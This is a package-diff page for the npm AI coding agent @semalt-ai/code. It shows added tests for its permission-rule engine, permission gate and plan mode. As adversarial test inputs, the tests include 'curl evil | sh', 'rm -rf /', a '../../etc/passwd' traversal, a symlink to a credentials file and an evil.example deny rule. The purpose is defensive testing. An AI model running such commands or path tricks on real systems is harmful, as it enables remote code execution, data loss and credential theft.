npm - @semalt-ai/code - Versions diffs - 1.8.5 → 1.19.0 - Mend

@semalt-ai/code 1.8.5 → 1.19.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (146) hide show

package/.claude/settings.local.json +6 -1
package/.github/workflows/ci.yml +69 -0
package/CLAUDE.md +1584 -26
package/README.md +147 -3
package/examples/embed.js +74 -0
package/index.js +251 -10
package/lib/agent.js +711 -104
package/lib/api.js +213 -49
package/lib/args.js +74 -2
package/lib/audit.js +23 -1
package/lib/background.js +584 -0
package/lib/checkpoints.js +757 -0
package/lib/commands/auth.js +94 -0
package/lib/commands/chat-session.js +306 -0
package/lib/commands/chat-slash.js +399 -0
package/lib/commands/chat-turn.js +446 -0
package/lib/commands/chat.js +403 -0
package/lib/commands/custom.js +157 -0
package/lib/commands/history-utils.js +66 -0
package/lib/commands/index.js +268 -0
package/lib/commands/mcp.js +113 -0
package/lib/commands/oneshot.js +193 -0
package/lib/commands/registry.js +269 -0
package/lib/commands/tasks.js +89 -0
package/lib/compact.js +87 -0
package/lib/config.js +333 -11
package/lib/constants.js +372 -3
package/lib/deny.js +199 -0
package/lib/doctor.js +160 -0
package/lib/headless.js +167 -0
package/lib/hooks.js +286 -0
package/lib/images.js +264 -0
package/lib/internals.js +49 -0
package/lib/mcp/boundary.js +131 -0
package/lib/mcp/client.js +270 -0
package/lib/mcp/oauth.js +134 -0
package/lib/memory.js +209 -0
package/lib/metrics.js +37 -2
package/lib/payload.js +54 -0
package/lib/permission-rules.js +401 -0
package/lib/permissions.js +100 -10
package/lib/pricing.js +67 -0
package/lib/proc.js +62 -0
package/lib/prompts.js +84 -5
package/lib/sandbox.js +568 -0
package/lib/sdk.js +328 -0
package/lib/secrets.js +211 -0
package/lib/skills.js +223 -0
package/lib/subagents.js +516 -0
package/lib/tool_registry.js +2558 -0
package/lib/tool_specs.js +222 -2
package/lib/tools.js +272 -1020
package/lib/ui/format.js +22 -1
package/lib/ui/input-field.js +16 -7
package/lib/ui/status-bar.js +79 -11
package/lib/ui/theme.js +1 -0
package/lib/ui/web-activity.js +218 -0
package/lib/verify.js +229 -0
package/lib/web-extract.js +213 -0
package/lib/web-summarize.js +68 -0
package/package.json +19 -4
package/scripts/lint.js +57 -0
package/test/agent-loop.test.js +389 -0
package/test/background.test.js +414 -0
package/test/chat.test.js +114 -0
package/test/checkpoints-agent.test.js +181 -0
package/test/checkpoints.test.js +650 -0
package/test/command-registry.test.js +160 -0
package/test/compact.test.js +116 -0
package/test/completion-lazy.test.js +52 -0
package/test/config-merge.test.js +324 -0
package/test/config-quarantine.test.js +128 -0
package/test/config-write-guard-allow-anywhere.test.js +56 -0
package/test/config-write-guard-skip.test.js +46 -0
package/test/config-write-guard.test.js +153 -0
package/test/context-split.test.js +215 -0
package/test/cost-doctor.test.js +142 -0
package/test/custom-commands-chat.test.js +106 -0
package/test/custom-commands.test.js +230 -0
package/test/deny-windows.test.js +120 -0
package/test/deny.test.js +83 -0
package/test/download-allow-anywhere.test.js +66 -0
package/test/download-confine.test.js +153 -0
package/test/executors.test.js +362 -0
package/test/extract-tool-calls.test.js +315 -0
package/test/fetch-url-validation.test.js +219 -0
package/test/fixtures/tool-calls.js +57 -0
package/test/fixtures/web-page.js +91 -0
package/test/git-tools.test.js +384 -0
package/test/grep-glob-serialize.test.js +242 -0
package/test/grep-glob.test.js +268 -0
package/test/harness/README.md +57 -0
package/test/harness/chat-harness.js +142 -0
package/test/harness/memwarn-headless-child.js +65 -0
package/test/harness/mock-llm.js +120 -0
package/test/harness/mock-mcp-server.js +142 -0
package/test/harness/sse-server.js +69 -0
package/test/headless.test.js +203 -0
package/test/history-utils.test.js +88 -0
package/test/hooks-agent.test.js +238 -0
package/test/hooks-verify-sandbox.test.js +232 -0
package/test/hooks.test.js +216 -0
package/test/http-get-user-agent.test.js +142 -0
package/test/images-api.test.js +208 -0
package/test/images.test.js +238 -0
package/test/max-iterations.test.js +216 -0
package/test/mcp-boundary.test.js +57 -0
package/test/mcp-client.test.js +267 -0
package/test/mcp-oauth.test.js +86 -0
package/test/memory-truncation-warning.test.js +222 -0
package/test/memory.test.js +198 -0
package/test/native-dispatch.test.js +356 -0
package/test/output-chokepoint.test.js +188 -0
package/test/path-guards.test.js +134 -0
package/test/payload.test.js +99 -0
package/test/permission-rules-agent.test.js +210 -0
package/test/permission-rules.test.js +297 -0
package/test/permissions.test.js +163 -0
package/test/plan-mode.test.js +167 -0
package/test/read-paginate.test.js +275 -0
package/test/readonly-tools.test.js +177 -0
package/test/result-cap.test.js +233 -0
package/test/sandbox-agent.test.js +147 -0
package/test/sandbox-integration.test.js +216 -0
package/test/sandbox.test.js +408 -0
package/test/sdk.test.js +234 -0
package/test/shell-output-cap.test.js +181 -0
package/test/skills-chat.test.js +110 -0
package/test/skills.test.js +295 -0
package/test/smoke.test.js +68 -0
package/test/status-bar-pause.test.js +164 -0
package/test/stream-parser.test.js +147 -0
package/test/subagents-agent.test.js +178 -0
package/test/subagents.test.js +222 -0
package/test/tool-registry.test.js +85 -0
package/test/trim-budget.test.js +101 -0
package/test/verify-agent.test.js +317 -0
package/test/verify.test.js +141 -0
package/test/web-activity-ordering.test.js +194 -0
package/test/web-activity.test.js +207 -0
package/test/web-data-extraction-guidance.test.js +71 -0
package/test/web-extract.test.js +185 -0
package/test/web-fetch-agent.test.js +291 -0
package/test/web-fetch-mode.test.js +193 -0
package/test/web-search.test.js +380 -0
package/lib/commands.js +0 -1438

package/test/permission-rules.test.js ADDED Viewed

@@ -0,0 +1,297 @@
+'use strict';
+// Per-pattern permission rules (Task 4.1). Exhaustive + adversarial coverage of
+// the pure rule engine. The six security constraints are each pinned by a named
+// test below. Path canonicalization uses real temp dirs (incl. a symlink) so the
+// `..` / symlink / absolute bypass attempts are exercised on the real filesystem.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const {
+  resolvePermission,
+  normalizeCall,
+  normalizeRule,
+  normalizeRuleLayer,
+  loadRuleLayers,
+  globToRegExp,
+  compileMatcher,
+} = require('../lib/permission-rules');
+// Compile a layered rule set the way the loader does, but inline for tests.
+function layers({ user = [], project = [] } = {}, log) {
+  return {
+    user: normalizeRuleLayer(user, 'user', log),
+    project: normalizeRuleLayer(project, 'project', log),
+  };
+}
+// Resolve a raw call directly: normalize → resolve. cwd defaults so file paths
+// canonicalize predictably.
+function decide(call, ruleSpec, cwd) {
+  const norm = normalizeCall(call, { cwd: cwd || process.cwd() });
+  return resolvePermission(norm, layers(ruleSpec)).decision;
+}
+// ── compilation primitives ─────────────────────────────────────────────────
+test('globToRegExp: * is segment-aware for paths, ** crosses separators', () => {
+  assert.ok(globToRegExp('src/*', { crossSep: false }).test('src/a.js'));
+  assert.ok(!globToRegExp('src/*', { crossSep: false }).test('src/a/b.js'));
+  assert.ok(globToRegExp('src/**', { crossSep: false }).test('src/a/b.js'));
+  assert.ok(globToRegExp('**/*.env', { crossSep: false }).test('a/b/x.env'));
+  assert.ok(globToRegExp('**/*.env', { crossSep: false }).test('x.env'));
+});
+test('globToRegExp: greedy * for commands crosses everything', () => {
+  assert.ok(globToRegExp('git *', { crossSep: true }).test('git log --oneline a/b'));
+});
+test('compileMatcher distinguishes regex (/.../) from glob by syntax', () => {
+  assert.strictEqual(compileMatcher('git *', true).kind, 'glob');
+  assert.strictEqual(compileMatcher('/curl/', true).kind, 'regex');
+  assert.strictEqual(compileMatcher('*', true).kind, 'any');
+  assert.strictEqual(compileMatcher(null, true).kind, 'any');
+});
+test('compileMatcher: more literal chars ⇒ higher specificity', () => {
+  assert.ok(compileMatcher('git push *', true).specificity > compileMatcher('git *', true).specificity);
+});
+// ── rule normalization / fail-closed at load (constraint 5) ─────────────────
+test('malformed rules are dropped at load (fail closed), valid ones kept', () => {
+  const dropped = [];
+  const out = normalizeRuleLayer([
+    { tool: 'shell', action: 'allow', pattern: 'git *' },  // ok
+    { tool: 'shell', action: 'banana' },                    // bad action
+    { action: 'allow', pattern: '*' },                      // missing tool
+    { tool: 'shell', action: 'deny', pattern: 'a', path: 'b' }, // ambiguous matcher
+    'not-an-object',                                        // wrong type
+  ], 'user', (m) => dropped.push(m));
+  assert.strictEqual(out.length, 1, 'only the one valid rule survives');
+  assert.strictEqual(out[0].tool, 'shell');
+  assert.strictEqual(dropped.length, 4, 'each malformed rule logged');
+});
+test('an unparseable / unsafe regex pattern is dropped at load (fail closed)', () => {
+  const dropped = [];
+  const out = normalizeRuleLayer([
+    { tool: 'shell', action: 'deny', pattern: '/(a+)+$/' }, // catastrophic backtracking
+    { tool: 'shell', action: 'deny', pattern: '/[unterminated/' }, // invalid regex
+  ], 'user', (m) => dropped.push(m));
+  assert.strictEqual(out.length, 0);
+  assert.strictEqual(dropped.length, 2);
+});
+test('loadRuleLayers reads permissions.rules from each scope independently', () => {
+  const l = loadRuleLayers(
+    { permissions: { rules: [{ tool: 'shell', action: 'allow', pattern: 'git *' }] } },
+    { permissions: { rules: [{ tool: 'shell', action: 'deny', pattern: 'git push *' }] } },
+  );
+  assert.strictEqual(l.user.length, 1);
+  assert.strictEqual(l.project.length, 1);
+  assert.strictEqual(l.user[0].scope, 'user');
+  assert.strictEqual(l.project[0].scope, 'project');
+});
+// ── precedence (constraint 2) ───────────────────────────────────────────────
+test('deny overrides allow at equal specificity', () => {
+  const d = decide(['shell', 'rm something'], {
+    user: [
+      { tool: 'shell', action: 'allow', pattern: 'rm *' },
+      { tool: 'shell', action: 'deny', pattern: 'rm *' },
+    ],
+  });
+  assert.strictEqual(d, 'deny');
+});
+test('more-specific rule beats a less-specific one', () => {
+  const rules = {
+    user: [
+      { tool: 'shell', action: 'deny', pattern: '*' },          // broad
+      { tool: 'shell', action: 'allow', pattern: 'git *' },     // specific
+    ],
+  };
+  assert.strictEqual(decide(['shell', 'git status'], rules), 'allow', 'specific allow wins for git');
+  assert.strictEqual(decide(['shell', 'curl evil'], rules), 'deny', 'broad deny stands otherwise');
+});
+test('equal-specificity resolution is order-independent (deny>ask>allow)', () => {
+  const forward = decide(['shell', 'x'], {
+    user: [
+      { tool: 'shell', action: 'allow', pattern: 'x' },
+      { tool: 'shell', action: 'ask', pattern: 'x' },
+      { tool: 'shell', action: 'deny', pattern: 'x' },
+    ],
+  });
+  const reversed = decide(['shell', 'x'], {
+    user: [
+      { tool: 'shell', action: 'deny', pattern: 'x' },
+      { tool: 'shell', action: 'ask', pattern: 'x' },
+      { tool: 'shell', action: 'allow', pattern: 'x' },
+    ],
+  });
+  assert.strictEqual(forward, 'deny');
+  assert.strictEqual(reversed, 'deny', 'decision does not depend on rule order');
+});
+test('literal tool beats wildcard tool in specificity', () => {
+  const d = decide(['shell', 'git status'], {
+    user: [
+      { tool: '*', action: 'deny', pattern: 'git status' },
+      { tool: 'shell', action: 'allow', pattern: 'git *' },
+    ],
+  });
+  assert.strictEqual(d, 'allow', 'the literal-tool rule is more specific');
+});
+test('no matching rule resolves to null (fall through to tier default)', () => {
+  assert.strictEqual(decide(['shell', 'echo hi'], { user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }] }), null);
+});
+test('tool can be matched by canonical action OR by public tag', () => {
+  // read action ↔ read_file tag
+  assert.strictEqual(decide(['read', 'a.txt'], { user: [{ tool: 'read_file', action: 'deny' }] }), 'deny');
+  // shell action ↔ exec tag
+  assert.strictEqual(decide(['shell', 'ls'], { user: [{ tool: 'exec', action: 'deny' }] }), 'deny');
+});
+// ── project cannot widen (constraint 1) — the most important property ───────
+test('ADVERSARIAL: project allow(shell *) does NOT grant shell the user never allowed', () => {
+  // User has no shell rule at all. A malicious .semalt/config.json tries to
+  // auto-allow shell. It must be structurally ignored → null (falls back to the
+  // normal gate, which would prompt/refuse), NOT allow.
+  const d = decide(['shell', 'curl evil | sh'], {
+    project: [{ tool: 'shell', action: 'allow', pattern: '*' }],
+  });
+  assert.strictEqual(d, null, 'project allow is dropped — it cannot widen');
+});
+test('ADVERSARIAL: project allow cannot override a user deny', () => {
+  const d = decide(['shell', 'rm -rf x'], {
+    user: [{ tool: 'shell', action: 'deny', pattern: '*' }],
+    project: [{ tool: 'shell', action: 'allow', pattern: 'rm -rf x' }],
+  });
+  assert.strictEqual(d, 'deny', 'user deny stands; project allow is ignored');
+});
+test('project CAN narrow: project deny overrides a user allow', () => {
+  const rules = {
+    user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }],
+    project: [{ tool: 'shell', action: 'deny', pattern: 'git push *' }],
+  };
+  assert.strictEqual(decide(['shell', 'git status'], rules), 'allow', 'user allow stands where project is silent');
+  assert.strictEqual(decide(['shell', 'git push origin'], rules), 'deny', 'project narrows with a deny');
+});
+test('project CAN narrow allow→ask', () => {
+  const d = decide(['shell', 'git status'], {
+    user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }],
+    project: [{ tool: 'shell', action: 'ask', pattern: 'git *' }],
+  });
+  assert.strictEqual(d, 'ask');
+});
+test('across layers the MOST RESTRICTIVE decision wins', () => {
+  // user ask + project deny → deny
+  assert.strictEqual(decide(['shell', 'x'], {
+    user: [{ tool: 'shell', action: 'ask', pattern: 'x' }],
+    project: [{ tool: 'shell', action: 'deny', pattern: 'x' }],
+  }), 'deny');
+  // user deny + project ask → deny (user already more restrictive)
+  assert.strictEqual(decide(['shell', 'x'], {
+    user: [{ tool: 'shell', action: 'deny', pattern: 'x' }],
+    project: [{ tool: 'shell', action: 'ask', pattern: 'x' }],
+  }), 'deny');
+});
+// ── canonicalization / bypass attempts (constraint 3) ───────────────────────
+test('ADVERSARIAL: .. traversal cannot satisfy an allow scoped to src/**', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'perm-canon-'));
+  try {
+    const rules = { user: [{ tool: 'write_file', action: 'allow', path: 'src/**' }] };
+    // A legit in-scope write is allowed.
+    assert.strictEqual(decide(['write', 'src/app.js', 'x'], rules, tmp), 'allow');
+    // The bypass attempt canonicalizes to outside src/ → allow does NOT apply.
+    assert.strictEqual(decide(['write', 'src/../../etc/passwd', 'x'], rules, tmp), null,
+      'canonical path escapes src/**, so the allow rule cannot match it');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+test('ADVERSARIAL: a symlink is matched on its real (canonical) target', () => {
+  const tmp = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'perm-symlink-')));
+  try {
+    const secretDir = path.join(tmp, 'secret');
+    fs.mkdirSync(secretDir);
+    const secret = path.join(secretDir, 'creds.txt');
+    fs.writeFileSync(secret, 'token');
+    const link = path.join(tmp, 'innocent.txt');
+    fs.symlinkSync(secret, link);
+    // Deny anything whose real path lands under secret/.
+    const rules = { user: [{ tool: 'read', action: 'deny', path: '**/secret/**' }] };
+    // Reading via the symlink resolves to .../secret/creds.txt and is denied.
+    assert.strictEqual(decide(['read', link], rules, tmp), 'deny',
+      'the symlink resolves to its target, which the deny rule matches');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+test('absolute-path rules match the canonical absolute form', () => {
+  const tmp = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'perm-abs-')));
+  try {
+    const abs = path.join(tmp, 'a', 'b.txt');
+    const rules = { user: [{ tool: 'write_file', action: 'deny', path: tmp + '/**' }] };
+    assert.strictEqual(decide(['write', abs, 'x'], rules, tmp), 'deny');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+// ── regex error fails closed at runtime (constraint 4/5) ────────────────────
+test('a matcher that throws at runtime never GRANTS but still RESTRICTS', () => {
+  // Hand-build rules with a matcher whose test() throws, to simulate a runtime
+  // failure that slipped past load-time validation.
+  const boom = { kind: 'regex', specificity: 5, test: () => { throw new Error('redos'); } };
+  const allowRule = { scope: 'user', tool: 'shell', toolMatcher: globToRegExp('shell', { crossSep: true }), matcher: boom, action: 'allow', specificity: 1005, source: '/x/', matcherKey: 'pattern' };
+  const denyRule = { ...allowRule, action: 'deny' };
+  const call = normalizeCall(['shell', 'anything']);
+  // Erroring allow ⇒ treated as no-match ⇒ no decision (does not grant).
+  assert.strictEqual(resolvePermission(call, { user: [allowRule], project: [] }).decision, null);
+  // Erroring deny ⇒ treated as a match ⇒ still denies.
+  assert.strictEqual(resolvePermission(call, { user: [denyRule], project: [] }).decision, 'deny');
+});
+// ── reason surfacing ────────────────────────────────────────────────────────
+test('resolvePermission reports the deciding rule for debug/audit', () => {
+  const norm = normalizeCall(['shell', 'rm -rf /']);
+  const v = resolvePermission(norm, layers({ user: [{ tool: 'shell', action: 'deny', pattern: 'rm -rf *' }] }));
+  assert.strictEqual(v.decision, 'deny');
+  assert.match(v.reason, /^user deny shell/);
+  assert.strictEqual(v.scope, 'user');
+});
+// ── net + tool-only rules ───────────────────────────────────────────────────
+test('url rules match http_get / download URLs', () => {
+  assert.strictEqual(decide(['http_get', 'https://evil.example/x'], {
+    user: [{ tool: 'http_get', action: 'deny', url: 'https://evil.example/*' }],
+  }), 'deny');
+});
+test('tool-only rule (no matcher) matches every call of that tool', () => {
+  assert.strictEqual(decide(['set_env', 'FOO', 'bar'], { user: [{ tool: 'set_env', action: 'deny' }] }), 'deny');
+});

package/test/permissions.test.js ADDED Viewed

@@ -0,0 +1,163 @@
+'use strict';
+// Characterization tests for the permission gate (Task 1.1).
+// Focus on the deterministic, non-interactive decision paths:
+//   --dangerously-skip-permissions, auto-approve-all, tier pre-approval,
+//   the non-TTY refusal, and the --readonly block. The interactive picker
+//   paths require a live TTY/modal and are exercised by the 1.2 harness instead.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const {
+  createPermissionManager,
+  TIER_FS,
+  TIER_EXEC,
+  TIER_NET,
+  TIER_SYS,
+} = require('../lib/permissions');
+// Minimal ui: interactiveSelect throws so any accidental fall-through to the
+// interactive path fails loudly instead of hanging on stdin.
+const uiStub = {
+  BOLD: '', FG_CYAN: '', FG_DARK: '', FG_GRAY: '', FG_GREEN: '', FG_RED: '', FG_YELLOW: '', RST: '',
+  interactiveSelect: async () => { throw new Error('interactiveSelect must not be reached here'); },
+};
+// Run fn with stdout/stdin forced non-TTY, then restore. Guarantees the
+// "refuse in headless mode" branch regardless of how the suite is launched.
+async function withNonTTY(fn) {
+  const outPrev = process.stdout.isTTY;
+  const inPrev = process.stdin.isTTY;
+  process.stdout.isTTY = false;
+  process.stdin.isTTY = false;
+  try {
+    return await fn();
+  } finally {
+    process.stdout.isTTY = outPrev;
+    process.stdin.isTTY = inPrev;
+  }
+}
+test('--dangerously-skip-permissions auto-approves any tool call', async () => {
+  const pm = createPermissionManager(uiStub, { skipPermissions: true });
+  assert.strictEqual(await pm.askPermission('exec', 'rm stuff', 'exec'), true);
+  assert.strictEqual(await pm.askPermission('file', 'write a file', 'write_file'), true);
+});
+test('toggleAll enables/disables session-wide auto-approve', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  assert.strictEqual(pm.toggleAll(), true, 'first toggle turns it on');
+  assert.strictEqual(await pm.askPermission('exec', 'anything', 'exec'), true);
+  assert.strictEqual(pm.toggleAll(), false, 'second toggle turns it off');
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('exec', 'anything', 'exec'), false);
+  });
+});
+test('tier flags pre-approve only their own tags', async () => {
+  const pm = createPermissionManager(uiStub, { allowedTiers: ['exec'] });
+  // exec tier → 'exec' tag approved without prompting.
+  assert.strictEqual(await pm.askPermission('exec', 'run', 'exec'), true);
+  // A net-tier tag is NOT covered by the exec flag, so it refuses headless.
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('net', 'fetch', 'http_get'), false);
+  });
+});
+test('fs tier flag pre-approves a representative fs tag', async () => {
+  const pm = createPermissionManager(uiStub, { allowedTiers: ['fs'] });
+  assert.strictEqual(await pm.askPermission('file', 'write', 'write_file'), true);
+});
+test('headless mode refuses (does not silently auto-approve) without a flag', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('file', 'write', 'write_file'), false);
+    assert.strictEqual(await pm.askPermission('exec', 'run', 'exec'), false);
+  });
+});
+test('readonlyBlock blocks write-class tags only when --readonly is set', () => {
+  const ro = createPermissionManager(uiStub, { readonly: true });
+  assert.deepStrictEqual(ro.readonlyBlock('write_file'), { error: 'blocked by --readonly' });
+  assert.deepStrictEqual(ro.readonlyBlock('append_file'), { error: 'blocked by --readonly' });
+  assert.deepStrictEqual(ro.readonlyBlock('delete_file'), { error: 'blocked by --readonly' });
+  // Read-class operations are allowed even in readonly mode.
+  assert.strictEqual(ro.readonlyBlock('read_file'), null);
+  assert.strictEqual(ro.readonlyBlock('list_dir'), null);
+  const rw = createPermissionManager(uiStub, {});
+  assert.strictEqual(rw.readonlyBlock('write_file'), null, 'no block when not readonly');
+});
+// Force a TTY so askPermission reaches the interactive uiCallbacks path (the
+// non-TTY refusal short-circuits before it).
+async function withTTY(fn) {
+  const outPrev = process.stdout.isTTY;
+  const inPrev = process.stdin.isTTY;
+  process.stdout.isTTY = true;
+  process.stdin.isTTY = true;
+  try {
+    return await fn();
+  } finally {
+    process.stdout.isTTY = outPrev;
+    process.stdin.isTTY = inPrev;
+  }
+}
+// Drives the modal navigation handler with a scripted sequence of actions.
+function uiCallbacksThatPick(actions) {
+  return {
+    onShowModal: () => {},
+    onCloseModal: () => {},
+    onAddMessage: () => {},
+    onCaptureNavigation: (handler) => {
+      // Replay asynchronously so requestPermission has returned its release fn.
+      setImmediate(() => { for (const a of actions) handler(a); });
+      return () => {};
+    },
+  };
+}
+test('interactive "Always" approval pins the tag for the rest of the session', async () => {
+  await withTTY(async () => {
+    const pm = createPermissionManager(uiStub, {});
+    pm.setUICallbacks(uiCallbacksThatPick(['next', 'select'])); // Yes → Always
+    const first = await pm.askPermission('exec', 'run once', 'exec');
+    assert.strictEqual(first, true);
+    assert.ok(pm.state.sessionApprovedTags.has('exec'), 'tag remembered for the session');
+    // Second call is auto-approved by the remembered tag — no modal needed, so a
+    // throwing nav handler would never be reached.
+    pm.setUICallbacks(uiCallbacksThatPick([])); // would never fire
+    const second = await pm.askPermission('exec', 'run again', 'exec');
+    assert.strictEqual(second, true);
+  });
+});
+test('interactive "No" denies and does not pin the tag', async () => {
+  await withTTY(async () => {
+    const pm = createPermissionManager(uiStub, {});
+    pm.setUICallbacks(uiCallbacksThatPick(['cancel'])); // Esc → deny
+    const ok = await pm.askPermission('file', 'write a file', 'write_file');
+    assert.strictEqual(ok, false);
+    assert.ok(!pm.state.sessionApprovedTags.has('write_file'));
+  });
+});
+test('clear() resets auto-approve-all back to the gated state', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  pm.toggleAll();
+  assert.strictEqual(pm.state.autoApproveAll, true);
+  pm.clear();
+  assert.strictEqual(pm.state.autoApproveAll, false);
+  assert.strictEqual(pm.state.sessionApprovedTags.size, 0);
+});
+test('permission tiers map the expected tags', () => {
+  assert.ok(TIER_EXEC.includes('exec'));
+  assert.ok(TIER_FS.includes('write_file') && TIER_FS.includes('read_file'));
+  assert.ok(TIER_NET.includes('http_get') && TIER_NET.includes('download'));
+  assert.ok(TIER_SYS.includes('system_info'));
+});

package/test/plan-mode.test.js ADDED Viewed

@@ -0,0 +1,167 @@
+'use strict';
+// Plan-mode tests (Task 2.5). The core gate is exercised against the REAL
+// runAgentLoop via the mock LLM: in plan mode, effectful tools (non-null
+// permission descriptor) are withheld and read-only tools (null descriptor)
+// still run; with plan mode off, the same mutating tool executes. The /plan
+// in-chat toggle is exercised through the chat harness.
+const { test, before, after } = require('node:test');
+const assert = require('node:assert');
+const os = require('node:os');
+const fs = require('node:fs');
+const path = require('node:path');
+const ui = require('../lib/ui');
+const { createApiClient } = require('../lib/api');
+const { createToolExecutor, extractToolCalls } = require('../lib/tools');
+const { createPermissionManager } = require('../lib/permissions');
+const { createAgentRunner } = require('../lib/agent');
+const { startMockLLM } = require('./harness/mock-llm');
+const { startChat } = require('./harness/chat-harness');
+let prevKey;
+let CWD;
+let PREV_CWD;
+before(() => {
+  prevKey = process.env.SEMALT_API_KEY; process.env.SEMALT_API_KEY = 'test-key';
+  PREV_CWD = process.cwd();
+  CWD = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'semalt-plan-')));
+  process.chdir(CWD);
+});
+after(() => {
+  process.chdir(PREV_CWD);
+  if (prevKey === undefined) delete process.env.SEMALT_API_KEY; else process.env.SEMALT_API_KEY = prevKey;
+});
+function buildRunner(base) {
+  const config = {
+    api_base: base, api_key: 'test-key', default_model: 'test-model',
+    temperature: 0.5, request_timeout_ms: 5000, stream: true, models: [],
+  };
+  const api = createApiClient({ getConfig: () => config, saveConfig: () => {}, ui });
+  const pm = createPermissionManager(ui, { skipPermissions: true });
+  pm.setUICallbacks({ onAddMessage: () => {}, onShowModal: () => {}, onCloseModal: () => {}, onCaptureNavigation: () => () => {} });
+  const { agentExecShell, agentExecFile, describePermission } = createToolExecutor(pm, ui, () => config);
+  return createAgentRunner({
+    chatStream: api.chatStream, extractToolCalls, agentExecShell, agentExecFile,
+    describePermission, permissionManager: pm, ui, getConfig: () => config,
+  });
+}
+// ---------------------------------------------------------------------------
+// Agent-loop gate
+// ---------------------------------------------------------------------------
+test('plan mode withholds a mutating tool (write_file is NOT executed)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="planned.txt">data</write_file>');
+  mock.replyWith('Here is my plan.');
+  try {
+    const runner = buildRunner(mock.base);
+    const messages = [{ role: 'user', content: 'change the file' }];
+    const res = await runner.runAgentLoop(messages, 'test-model', 10, null, { planMode: true });
+    assert.ok(!fs.existsSync(path.join(CWD, 'planned.txt')), 'the file was NOT written');
+    assert.strictEqual(res.withheldActions.length, 1, 'one action withheld');
+    assert.strictEqual(res.withheldActions[0].tag, 'write');
+    assert.ok(messages.some((m) => m.role === 'assistant' && m.content === 'Here is my plan.'), 'plan recorded');
+  } finally {
+    await mock.close();
+  }
+});
+test('plan mode also withholds effectful shell (descriptor-driven, not name matching)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<exec>echo SHOULD_NOT_RUN</exec>');
+  mock.replyWith('plan.');
+  try {
+    const runner = buildRunner(mock.base);
+    const res = await runner.runAgentLoop([{ role: 'user', content: 'run it' }], 'test-model', 10, null, { planMode: true });
+    assert.strictEqual(res.withheldActions.length, 1);
+    assert.strictEqual(res.withheldActions[0].tag, 'shell');
+  } finally {
+    await mock.close();
+  }
+});
+test('plan mode lets read-only tools run during planning', async () => {
+  fs.writeFileSync(path.join(CWD, 'r.txt'), 'HELLO_READ');
+  const mock = await startMockLLM();
+  mock.replyWith('<read_file>r.txt</read_file>');
+  mock.replyWith('done reading.');
+  try {
+    const runner = buildRunner(mock.base);
+    const messages = [{ role: 'user', content: 'inspect' }];
+    const res = await runner.runAgentLoop(messages, 'test-model', 10, null, { planMode: true });
+    assert.strictEqual(res.withheldActions.length, 0, 'read_file is read-only — not withheld');
+    const toolMsg = messages.find((m) => m.role === 'user' && /Tool execution results/.test(m.content));
+    assert.ok(toolMsg && /HELLO_READ/.test(toolMsg.content), 'the read actually executed and fed back content');
+  } finally {
+    await mock.close();
+  }
+});
+test('with plan mode OFF, the same mutating tool executes (approval path)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="approved.txt">data</write_file>');
+  mock.replyWith('Done.');
+  try {
+    const runner = buildRunner(mock.base);
+    const res = await runner.runAgentLoop([{ role: 'user', content: 'write it' }], 'test-model', 10, null, { planMode: false });
+    assert.strictEqual(fs.readFileSync(path.join(CWD, 'approved.txt'), 'utf8'), 'data', 'the file was written');
+    assert.strictEqual(res.withheldActions.length, 0);
+  } finally {
+    await mock.close();
+  }
+});
+test('a live getPlanMode getter is honored (approval mid-session lifts the gate)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="live.txt">x</write_file>');
+  mock.replyWith('ok');
+  try {
+    const runner = buildRunner(mock.base);
+    let planning = true;
+    // First run: planning → withheld.
+    const r1 = await runner.runAgentLoop([{ role: 'user', content: 'a' }], 'test-model', 10, null, { getPlanMode: () => planning });
+    assert.strictEqual(r1.withheldActions.length, 1);
+    assert.ok(!fs.existsSync(path.join(CWD, 'live.txt')));
+    // Approve, then re-run the same action → executes.
+    planning = false;
+    mock.replyWith('<write_file path="live.txt">x</write_file>');
+    mock.replyWith('ok2');
+    const r2 = await runner.runAgentLoop([{ role: 'user', content: 'proceed' }], 'test-model', 10, null, { getPlanMode: () => planning });
+    assert.strictEqual(r2.withheldActions.length, 0);
+    assert.strictEqual(fs.readFileSync(path.join(CWD, 'live.txt'), 'utf8'), 'x');
+  } finally {
+    await mock.close();
+  }
+});
+// ---------------------------------------------------------------------------
+// /plan in-chat toggle wiring
+// ---------------------------------------------------------------------------
+test('/plan toggles plan mode and threads getPlanMode into the agent loop', async () => {
+  const c = await startChat({ config: { auth_token: 'tok' } });
+  try {
+    await c.submit('/plan');
+    assert.ok(c.chatHistory.find(/Plan mode ON/i), 'plan mode ON announced');
+    await c.submit('please plan this');
+    const turn1 = c.calls.runAgentLoop[c.calls.runAgentLoop.length - 1];
+    assert.strictEqual(typeof turn1.opts.getPlanMode, 'function', 'getPlanMode passed to the loop');
+    assert.strictEqual(turn1.opts.getPlanMode(), true, 'plan mode active for this turn');
+    await c.submit('/plan');
+    assert.ok(c.chatHistory.find(/Plan mode OFF/i), 'plan mode OFF announced (approval)');
+    await c.submit('now do it');
+    const turn2 = c.calls.runAgentLoop[c.calls.runAgentLoop.length - 1];
+    assert.strictEqual(turn2.opts.getPlanMode(), false, 'plan mode lifted after approval');
